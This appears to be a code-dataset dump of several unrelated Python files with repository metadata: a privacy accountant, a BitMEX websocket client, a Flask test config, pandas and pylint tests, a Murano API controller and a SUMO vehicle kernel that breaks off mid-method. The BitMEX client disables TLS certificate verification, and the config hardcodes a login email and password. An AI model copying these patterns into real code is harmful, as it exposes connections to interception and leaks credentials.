noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
else:
# Unsupported event (including `UnsupportedDpEvent`).
return False
def get_epsilon(self, target_delta: float) -> float:
return _compute_epsilon(self._orders, self._rdp, target_delta)
def get_delta(self, target_epsilon: float) -> float:
return _compute_delta(self._orders, self._rdp, target_epsilon)
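# Illustrative usage sketch (assumes the public compose() exposed by the
# PrivacyAccountant base class; the numbers are arbitrary):
#   accountant = RdpAccountant()
#   accountant.compose(dp_event.PoissonSampledDpEvent(
#       sampling_probability=0.01,
#       event=dp_event.GaussianDpEvent(noise_multiplier=1.1)), count=1000)
#   eps = accountant.get_epsilon(target_delta=1e-5)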
| 33.508943
| 80
| 0.65426
|
966e552590e84aaad282fe310ab44a4b93d8e287
| 4,119
|
py
|
Python
|
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
from bitmex_websocket.auth.api_key_auth import generate_nonce,\
generate_signature
from bitmex_websocket.settings import settings
from pyee import EventEmitter
from urllib.parse import urlparse
from websocket import WebSocketApp
import alog
import json
import ssl
import time
__all__ = ['BitMEXWebsocket']
class BitMEXWebsocketConnectionError(Exception):
pass
class BitMEXWebsocket(
WebSocketApp,
EventEmitter
):
def __init__(
self,
should_auth=False,
heartbeat=True,
ping_interval=10,
ping_timeout=9,
**kwargs
):
self.ping_timeout = ping_timeout
self.ping_interval = ping_interval
self.should_auth = should_auth
self.heartbeat = heartbeat
self.channels = []
self.reconnect_count = 0
super().__init__(
url=self.gen_url(),
header=self.header(),
on_message=self.on_message,
on_close=self.on_close,
on_open=self.on_open,
on_error=self.on_error,
on_pong=self.on_pong,
**kwargs
)
super(EventEmitter, self).__init__()
self.on('subscribe', self.on_subscribe)
def gen_url(self):
base_url = settings.BASE_URL
url_parts = list(urlparse(base_url))
query_string = ''
if self.heartbeat:
query_string = '?heartbeat=true'
url = "wss://{}/realtime{}".format(url_parts[1], query_string)
return url
def run_forever(self, **kwargs):
"""Connect to the websocket in a thread."""
# setup websocket.run_forever arguments
ws_run_args = {
'sslopt': {"cert_reqs": ssl.CERT_NONE}
}
if self.heartbeat:
ws_run_args['ping_timeout'] = self.ping_timeout
ws_run_args['ping_interval'] = self.ping_interval
alog.debug(ws_run_args)
super().run_forever(**ws_run_args)
def on_pong(self, message):
timestamp = float(time.time() * 1000)
latency = timestamp - (self.last_ping_tm * 1000)
self.emit('latency', latency)
def subscribe(self, channel: str):
subscription_msg = {"op": "subscribe", "args": [channel]}
self._send_message(subscription_msg)
def _send_message(self, message):
self.send(json.dumps(message))
def is_connected(self):
return self.sock.connected
@staticmethod
def on_subscribe(message):
if message['success']:
alog.debug("Subscribed to %s." % message['subscribe'])
else:
raise Exception('Unable to subscribe.')
def on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
if 'error' in message:
self.on_error(message['error'])
action = message['action'] if 'action' in message else None
if action:
self.emit('action', message)
elif 'subscribe' in message:
self.emit('subscribe', message)
elif 'status' in message:
self.emit('status', message)
def header(self):
"""Return auth headers. Will use API Keys if present in settings."""
auth_header = []
if self.should_auth:
alog.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature
# of a nonce and the WS API endpoint.
alog.debug(settings.BITMEX_API_KEY)
nonce = generate_nonce()
api_signature = generate_signature(
settings.BITMEX_API_SECRET, 'GET', '/realtime', nonce, '')
auth_header = [
"api-nonce: " + str(nonce),
"api-signature: " + api_signature,
"api-key:" + settings.BITMEX_API_KEY
]
return auth_header
def on_open(self):
alog.debug("Websocket Opened.")
self.emit('open')
def on_close(self):
alog.info('Websocket Closed')
def on_error(self, error):
raise BitMEXWebsocketConnectionError(error)
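# Illustrative usage sketch (the channel name is an example):
#   ws = BitMEXWebsocket(should_auth=False)
#   ws.on('open', lambda: ws.subscribe('trade:XBTUSD'))
#   ws.on('action', print)
#   ws.run_forever()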
| 27.098684
| 76
| 0.599903
|
f3d25a52030648e8f143121ef4e121eab2d1d163
| 1,250
|
py
|
Python
|
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | null | null | null |
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 368
|
2018-12-18T14:43:20.000Z
|
2022-03-02T02:54:18.000Z
|
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 2
|
2019-10-02T03:06:06.000Z
|
2020-10-05T16:53:48.000Z
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_DATABASE_URI = "postgresql://ed_user:ed_pass@localhost/stardrive_test"
TESTING = True
CORS_ENABLED = True
DEBUG = False
DEVELOPMENT = False
MASTER_URL = "http://localhost:5000"
MASTER_EMAIL = "daniel.h.funk@gmail.com"
MASTER_PASS = "dfunk7"
MIRRORING = False
DELETE_RECORDS = False
ELASTIC_SEARCH = {
"index_prefix": "stardrive_test",
"hosts": ["localhost"],
"port": 9200,
"timeout": 20,
"verify_certs": False,
"use_ssl": False,
"http_auth_user": "",
"http_auth_pass": ""
}
#: Default attribute map for single sign-on.
# This makes it a little easier to spoof the values that come back from
# Shibboleth. One of the aspects of constructing custom headers is that
# they are automatically converted to META Keys, so we have to refer
# to them as that when pulling them out. This is slightly different from
# the structure that actually comes back from Shibboleth.
SSO_ATTRIBUTE_MAP = {
'HTTP_EPPN': (True, 'eppn'), # dhf8r@virginia.edu
'HTTP_UID': (False, 'uid'), # dhf8r
'HTTP_GIVENNAME': (False, 'givenName'), # Daniel
'HTTP_MAIL': (False, 'email') # dhf8r@Virginia.EDU
}
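# Each value appears to follow the Flask-SSO convention of
# (required, local_attribute_name) pairs keyed by the incoming META header.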
GOOGLE_MAPS_API_KEY = "TEST_API_KEY_GOES_HERE"
| 30.487805
| 81
| 0.716
|
2f6337e162ad32a70995654d15ce0b560ae0d3d7
| 3,492
|
py
|
Python
|
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
import pandas as pd
from pandas import MultiIndex
import pandas._testing as tm
def test_fillna(idx):
# GH 11343
msg = "isna is not defined for MultiIndex"
with pytest.raises(NotImplementedError, match=msg):
idx.fillna(idx[0])
def test_dropna():
# GH 6194
idx = pd.MultiIndex.from_arrays(
[
[1, np.nan, 3, np.nan, 5],
[1, 2, np.nan, np.nan, 5],
["a", "b", "c", np.nan, "e"],
]
)
exp = pd.MultiIndex.from_arrays([[1, 5], [1, 5], ["a", "e"]])
tm.assert_index_equal(idx.dropna(), exp)
tm.assert_index_equal(idx.dropna(how="any"), exp)
exp = pd.MultiIndex.from_arrays(
[[1, np.nan, 3, 5], [1, 2, np.nan, 5], ["a", "b", "c", "e"]]
)
tm.assert_index_equal(idx.dropna(how="all"), exp)
msg = "invalid how option: xxx"
with pytest.raises(ValueError, match=msg):
idx.dropna(how="xxx")
# GH26408
# test if missing values are dropped for multiindex constructed
# from codes and values
idx = MultiIndex(
levels=[[np.nan, None, pd.NaT, "128", 2], [np.nan, None, pd.NaT, "128", 2]],
codes=[[0, -1, 1, 2, 3, 4], [0, -1, 3, 3, 3, 4]],
)
expected = MultiIndex.from_arrays([["128", 2], ["128", 2]])
tm.assert_index_equal(idx.dropna(), expected)
tm.assert_index_equal(idx.dropna(how="any"), expected)
expected = MultiIndex.from_arrays(
[[np.nan, np.nan, "128", 2], ["128", "128", "128", 2]]
)
tm.assert_index_equal(idx.dropna(how="all"), expected)
def test_nulls(idx):
# this is really a smoke test for the methods
# as these are adequately tested for function elsewhere
msg = "isna is not defined for MultiIndex"
with pytest.raises(NotImplementedError, match=msg):
idx.isna()
@pytest.mark.xfail(reason="isna is not defined for MultiIndex")
def test_hasnans_isnans(idx):
# GH 11343, added tests for hasnans / isnans
index = idx.copy()
# cases in indices doesn't include NaN
expected = np.array([False] * len(index), dtype=bool)
tm.assert_numpy_array_equal(index._isnan, expected)
assert index.hasnans is False
index = idx.copy()
values = index.values
values[1] = np.nan
index = type(idx)(values)
expected = np.array([False] * len(index), dtype=bool)
expected[1] = True
tm.assert_numpy_array_equal(index._isnan, expected)
assert index.hasnans is True
def test_nan_stays_float():
# GH 7031
idx0 = pd.MultiIndex(
levels=[["A", "B"], []], codes=[[1, 0], [-1, -1]], names=[0, 1]
)
idx1 = pd.MultiIndex(levels=[["C"], ["D"]], codes=[[0], [0]], names=[0, 1])
idxm = idx0.join(idx1, how="outer")
assert pd.isna(idx0.get_level_values(1)).all()
# the following failed in 0.14.1
assert pd.isna(idxm.get_level_values(1)[:-1]).all()
df0 = pd.DataFrame([[1, 2]], index=idx0)
df1 = pd.DataFrame([[3, 4]], index=idx1)
dfm = df0 - df1
assert pd.isna(df0.index.get_level_values(1)).all()
# the following failed in 0.14.1
assert pd.isna(dfm.index.get_level_values(1)[:-1]).all()
def test_tuples_have_na():
index = MultiIndex(
levels=[[1, 0], [0, 1, 2, 3]],
codes=[[1, 1, 1, 1, -1, 0, 0, 0], [0, 1, 2, 3, 0, 1, 2, 3]],
)
assert pd.isna(index[4][0])
assert pd.isna(index.values[4][0])
| 30.365217
| 85
| 0.580183
|
afcb2cd2413c35eb509560cf24f7a2a882ae639c
| 1,133
|
py
|
Python
|
virtual/Lib/site-packages/pylint/test/functional/names_in__all__.py
|
JamesKimari/pitch-one
|
aac9007716bf2e3b6446588a06508fac068f3d20
|
[
"MIT"
] | 35
|
2016-09-22T22:53:14.000Z
|
2020-02-13T15:12:21.000Z
|
virtual/lib/python3.6/site-packages/pylint/test/functional/names_in__all__.py
|
evantoh/patient-management-system
|
6637eb1344775633759165260ed99843581c0e72
|
[
"Unlicense"
] | 32
|
2018-05-01T05:24:43.000Z
|
2022-03-11T23:20:39.000Z
|
virtual/lib/python3.6/site-packages/pylint/test/functional/names_in__all__.py
|
evantoh/patient-management-system
|
6637eb1344775633759165260ed99843581c0e72
|
[
"Unlicense"
] | 88
|
2016-11-27T02:16:11.000Z
|
2020-02-28T05:10:26.000Z
|
# pylint: disable=too-few-public-methods,no-self-use, no-absolute-import,import-error
"""Test Pylint's use of __all__.
* NonExistant is not defined in this module, and it is listed in
__all__. An error is expected.
* This module imports path and republished it in __all__. No errors
are expected.
"""
from __future__ import print_function
from os import path
from collections import deque
from missing import Missing
__all__ = [
'Dummy',
'', # [undefined-all-variable]
Missing,
SomeUndefined, # [undefined-variable]
'NonExistant', # [undefined-all-variable]
'path',
'func', # [undefined-all-variable]
'inner', # [undefined-all-variable]
'InnerKlass', deque.__name__] # [undefined-all-variable]
class Dummy(object):
"""A class defined in this module."""
pass
DUMMY = Dummy()
def function():
"""Function docstring
"""
pass
function()
class Klass(object):
"""A klass which contains a function"""
def func(self):
"""A klass method"""
inner = None
print(inner)
class InnerKlass(object):
"""A inner klass"""
pass
| 22.66
| 85
| 0.655781
|
eab6989cee130838c739c635cb06aab0118184fe
| 1,923
|
py
|
Python
|
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | 1
|
2021-07-28T23:19:49.000Z
|
2021-07-28T23:19:49.000Z
|
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | null | null | null |
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_serialization import jsonutils
from six.moves import http_client
import webob.dec
from murano.common import wsgi
CONF = cfg.CONF
class Controller(object):
"""A wsgi controller that reports which API versions are supported."""
def index(self, req):
"""Respond to a request for all OpenStack API versions."""
def build_version_object(version, path, status):
return {
'id': 'v%s' % version,
'status': status,
'links': [
{
'rel': 'self',
'href': '%s/%s/' % (req.host_url, path),
},
],
}
version_objs = []
version_objs.extend([
build_version_object(1.0, 'v1', 'CURRENT'),
])
response = webob.Response(request=req,
status=http_client.MULTIPLE_CHOICES,
content_type='application/json')
response.body = jsonutils.dumps(dict(versions=version_objs))
return response
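# The serialized body has roughly this shape (the host URL is illustrative):
#   {"versions": [{"id": "v1.0", "status": "CURRENT",
#                  "links": [{"rel": "self",
#                             "href": "http://localhost:8082/v1/"}]}]}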
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
return self.index(req)
def create_resource(conf):
return wsgi.Resource(Controller())
| 31.016129
| 78
| 0.601144
|
e7d76996ebdf02fbdc11f6b83d23af980fa00228
| 48,066
|
py
|
Python
|
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
"""Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
STEPS = 10
rdelta = 255 / STEPS
# smoothly go from red to green as the speed increases
color_bins = [[int(255 - rdelta * i), int(rdelta * i), 0] for i in
range(STEPS + 1)]
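# With STEPS = 10 the bins fade linearly from [255, 0, 0] (slowest) through
# roughly [127, 127, 0] at the midpoint to [0, 255, 0] (fastest).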
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# number of vehicles that have been loaded but have not yet departed
self.num_not_departed = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = 0
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = 0
self._arrived_rl_ids = []
# whether or not to automatically color vehicles
try:
self._color_by_speed = sim_params.color_by_speed
self._force_color_update = sim_params.force_color_update
except AttributeError:
self._force_color_update = False
# old speeds used to compute accelerations
self.previous_speeds = {}
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.num_not_departed = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
# copy over the previous speeds
vehicle_obs = {}
for veh_id in self.__ids:
self.previous_speeds[veh_id] = self.get_speed(veh_id)
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
arrived_rl_ids = []
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id in self.get_rl_ids():
arrived_rl_ids.append(veh_id)
if veh_id in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
self._arrived_rl_ids.append(arrived_rl_ids)
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
if veh_id in self.get_ids() and vehicle_obs[veh_id] is not None:
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. TrafficLightGridEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids = 0
self._arrived_ids = 0
self._arrived_rl_ids.clear()
self.num_not_departed = 0
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.network.network,
"template_vehicles"):
for veh_id in self.master_kernel.network.network. \
template_vehicles:
vals = deepcopy(self.master_kernel.network.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
# updated the list of departed and arrived vehicles
self._num_departed.append(sim_obs[tc.VAR_LOADED_VEHICLES_NUMBER])
self._num_arrived.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_NUMBER])
self._departed_ids = sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]
self._arrived_ids = sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]
# update the number of not departed vehicles
self.num_not_departed += sim_obs[tc.VAR_LOADED_VEHICLES_NUMBER] - \
sim_obs[tc.VAR_DEPARTED_VEHICLES_NUMBER]
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
self.__vehicles[veh_id]["follower_headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
if headway[0] in self.__vehicles:
leader = self.__vehicles[headway[0]]
# if veh_id is closer from leader than another follower
# (in case followers are in different converging edges)
if ("follower_headway" not in leader or
headway[1] + min_gap < leader["follower_headway"]):
leader["follower"] = veh_id
leader["follower_headway"] = headway[1] + min_gap
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
if veh_id not in self.__ids:
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
if veh_id not in self.__rl_ids:
self.__rl_ids.append(veh_id)
else:
if veh_id not in self.__human_ids:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION,
tc.VAR_ROAD_ID,
tc.VAR_SPEED,
tc.VAR_EDGES,
tc.VAR_POSITION,
tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI,
tc.VAR_FUELCONSUMPTION,
tc.VAR_DISTANCE
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
self.__sumo_obs[veh_id][tc.VAR_FUELCONSUMPTION] = \
self.kernel_api.vehicle.getFuelConsumption(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
self.num_rl_vehicles = len(self.__rl_ids)
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def reset(self):
"""See parent class."""
self.previous_speeds = {}
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
if veh_id in self.__ids:
self.__ids.remove(veh_id)
# remove from the vehicles kernel
if veh_id in self.__vehicles:
del self.__vehicles[veh_id]
if veh_id in self.__sumo_obs:
del self.__sumo_obs[veh_id]
# remove it from all other id lists (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
elif veh_id in self.__rl_ids:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
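# Editor's note -- hedged worked example (not part of the original kernel):
# with sim_step = 0.5 s and the last int(5 / 0.5) = 10 recorded steps summing
# to 4 departures, get_inflow_rate(5) returns 3600 * 4 / (10 * 0.5) = 2880
# vehicles per hour; get_outflow_rate applies the same arithmetic to the
# arrival counts.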
def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
def get_arrived_ids(self):
"""See parent class."""
return self._arrived_ids
def get_arrived_rl_ids(self, k=1):
"""See parent class."""
if len(self._arrived_rl_ids) > 0:
arrived = []
